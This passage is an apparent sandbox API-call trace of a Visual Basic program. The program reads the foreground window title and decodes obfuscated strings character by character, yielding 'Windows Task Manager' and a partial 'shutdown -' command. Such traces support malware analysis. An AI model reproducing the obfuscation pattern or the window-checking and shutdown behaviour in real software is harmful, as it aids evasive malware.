MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.432] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.432] GetForegroundWindow () returned 0x10162 [0175.432] GetLastError () returned 0x0 [0175.433] SysStringLen (param_1=" ") returned 0xff [0175.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0175.433] SysStringLen (param_1=" ") returned 0xff [0175.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0175.433] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0175.433] GetLastError () returned 0x0 [0175.433] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0175.434] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0175.434] SysStringLen (param_1="Bl") returned 0x2 [0175.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bl", cchWideChar=3, lpMultiByteStr=0x116863c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bl", lpUsedDefaultChar=0x0) returned 3 [0175.434] SetWindowTextA (hWnd=0x103c4, lpString="Bl") returned 1 [0175.435] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0175.435] GetFocus () returned 0x0 [0175.435] lstrlenA (lpString="Bl") returned 2 [0175.435] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0175.435] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Bl") returned 2 [0175.435] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0175.435] GetFocus () returned 0x0 [0175.435] lstrcmpA (lpString1="Bl", lpString2="Bl") returned 0 [0175.436] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0175.436] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0175.436] GetFocus () returned 0x0 [0175.436] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0175.436] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0175.436] GetFocus () returned 0x0 [0175.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0175.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=3 | out: lpWideCharStr="Bl") returned 3 [0175.437] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0175.437] VarBstrCmp (bstrLeft="Bl", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.443] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0175.443] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.444] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0175.444] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.444] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.445] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.445] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.446] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.446] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0175.447] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.447] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.448] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.448] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.448] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.449] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.449] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.450] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0175.450] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.451] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.451] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.452] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.452] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.453] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0175.453] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.601] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.602] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.602] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0175.603] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.603] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.603] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.604] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.604] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.605] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.605] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.606] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.606] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.607] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.607] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.608] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.608] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.614] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.614] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.615] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.615] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.615] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0175.616] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.616] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.617] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.617] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.617] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.618] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0175.618] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.619] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.619] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.620] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.620] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.620] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.621] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.621] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.621] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.622] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, 